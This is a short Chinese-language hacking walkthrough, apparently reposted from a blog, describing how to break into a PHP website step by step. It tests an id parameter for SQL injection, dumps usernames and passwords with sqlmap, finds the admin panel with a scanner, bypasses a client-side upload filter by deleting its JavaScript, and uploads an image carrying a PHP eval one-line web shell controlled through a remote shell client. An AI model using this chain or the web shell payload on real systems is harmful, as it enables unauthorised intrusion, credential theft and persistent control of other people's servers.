1.找注入点
2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显
输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2,没有回显
说明存在注入。
3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。
4.使用御剑扫描后台。然后进行登录。
我们先上传一个脚本木马试试。
发现有黑名单。先看下是否是本地js校验。右键
——审查元素,发现是本地js校验。
我们找到表单form,删除相对应的脚本。
5.重新上传php一句话,发现
那么试下图片马
6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>
保存,命名为a.php。
然后上传,发现上传成功,使用菜刀连接,密码pw。
————————————————
作者:Randmancy文章来源:https://blog.csdn.net/qq_34341458
如有侵权,请联系删除
推荐阅读
查看更多精彩内容,还请关注橘猫学安全:
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247497920&idx=1&sn=ce7217d65bcba27ec8f22660b48cfc20&chksm=c04d7ffef73af6e8e5b3c14c5f6699227e6779eb904f0552e17c3928ed111782ae7ac00ab92d#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh